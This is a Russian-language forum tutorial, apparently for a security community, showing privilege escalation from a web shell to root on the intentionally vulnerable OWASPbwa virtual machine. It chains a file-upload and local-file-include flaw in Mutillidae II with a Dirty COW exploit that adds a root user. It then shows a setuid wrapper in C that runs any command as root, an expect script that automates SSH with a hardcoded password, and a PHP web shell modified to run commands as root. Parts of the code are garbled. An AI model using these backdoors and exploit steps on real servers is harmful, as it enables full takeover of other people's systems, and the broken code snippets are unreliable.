Представьте, что у нас есть веб-шелл на сайте, но другого доступа к серверу, кроме как через веб, мы не имеем. При этом мы хотим повысить свои привилегии до root. Ниже я расскажу, как это можно сделать.
Для экспериментов я выбрал уязвимую виртуальную машину OWASPbwa. На ней установлена Ubuntu с ядром
2.6.32-25-generic-pae, имеющим уязвимость Dirty COW. Проэксплуатировав данную уязвимость, мы сможем повысить свои привилегии в системе до
root. На гитхабе и exploit-db я нашел несколько подходящих эксплоитов, но успешно скомпилировался и сработал только один.
И так, устанавливаем OWASPbwa, запускаем, дожидаемся загрузки и смотрим ip-адрес, к которому мы подключимся через браузер. Логиниться в ОС не нужно.
Для чистоты эксперимента зальем веб-шел через какое-нибудь уязвимое приложение, коих тут предостаточно. Переходим в раздел Mutillidae II
И в меню находим нужную нам уязвимость, с помощью которой зальем шелл на сервер
Веб-шелл загружен в директорию /tmp:
Надо как-то подключиться к нему. В этом нам поможет уязвимость
local file include. Проверяем файл /etc/passwd
Уязвимость есть. Таким же образом подключаем загруженый ранее шелл. Немного мешает обзору меню от Mutillidae II, но не критично:
Этот веб-шелл мы используем для того, что бы загрузить на сервер файл с кодом эксплоита, скомпилировать его и запустить на выполнение. Эксплоит создаст в системе нового пользователя
codeby с паролем
codeby с правами
root.
Скачиваем эксплоит отсюда - Linux Kernel 2.6.22
#include
main
(
int
argc
,
char
*
argv
[
]
)
{
if
(
argc
==
3
)
{
if
(
strcmp
(
argv
[
1
]
,
"codeby"
)
==
0
)
{
setgid
(
0
)
;
setuid
(
0
)
;
system
(
argv
[
2
]
)
;
}
}
return
0
;
}
[/CODE]
Загружаем файл на веб-сервер в /tmp и компилируем
В /tmp появился новый файл
suid с правами
-rwxr-x--x. Устанавливаем ему suid-бит:
Теперь его права доступа должны быть
-rwsr-x--x:
символ x сменился на символ s, бит suid установлен.
Попробуем выполнить через наш suid-ник команду
id. Часть экрана скрыта за меню, поэтому для ценителей особых извращений сделаю вот так - сохраню вывод команды в файл
id:
и выведу содержимое файла в браузер:
Команда выполнилась от пользователя www-data, как и ожидалось. Чтобы команда выполнилась от рута, нужно сделать владельцем suid-файла рута. И делать это надо конечно-же из под рута. Но как? Пользователю www-data нельзя выполнять команды от sudo или su.
Выход такой — мы из веб-шелла выполним ssh-подключение к
127.0.0.1 с известным именем и паролем рут-пользователя (codeby:codeby) и выполним через ssh команду, которой сделаем пользователя
codeby владельцем suid-файла:
Код:
ssh античат @127.0.0.1 chown античат /tmp/suid
Тут оказалось тоже не все так просто. Веб-шелл после подключения ssh не выводит в браузер запрос пароля, поэтому будем использовать скрипт, которыйавтоматизирует подключение по ssh с паролем и выполнит нужную команду. Создаем файл script.sh со следующим содержимым:
Bash:
Код:
#!/usr/bin/expect -f
set
timeout
5
spawn
ssh
codeby@127.0.0.1
chown
codeby /tmp/suid
#expect "(yes/no?)"
#send -- "yes\r"
expect
"?*assword:*"
send --
"codeby\r"
send --
"\r"
expect
eof
Загружаем скрипт на веб-сервер в /tmp, делаем его исполняемым и выполняем его в консоли веб-шелла:
Если все прошло нормально, видим, что владелец suid-файла сменился:
Правда и suid-бит после смены владельца сбросился. Установим его еще раз от рута. Для этого в script.sh надо соответственно подправить отправляемую команду и выпонить скрипт. Теперь все нормально:
Пробуем выполнить через suid-файл команду id:
Как видим, теперь команда выполнилась от рута. Что ж, осталось автоматизировать использование шеллом нашего suid-файла, чтоб каждый раз не вводить
./suid password foo bar, а сразу выполнять нужную команду.
Возьмем такой простой php-вебшелл:
PHP:
Код:
root_shell
";
$cmd = ($_REQUEST['cmd']);
system('$cmd');
echo "";
die;
}
?>
</html
И в строке, где выполняется функция system() сделаем маленькую модификацию:
Код:
system("/tmp/suid античат '$cmd' ");
Назовем наш файл с шеллом
root_shell.php и загрузим на веб-сервер в /tmp.
Что бы никакие боковые меню больше не мешали обзору, сразу переместим шелл в /var/www:
Код:
./suid античат 'mv /tmp/root_shell.php /var/www/root_shell.php'
и переходим в шел по адресу 192.168.56.103/root_shell.php
Что бы выпонить команду, в адресной строке используйте параметр cmd:
Команда id выпонилась от root (codeby)
На этом все. Спасибо, если дочитали и затестили способ )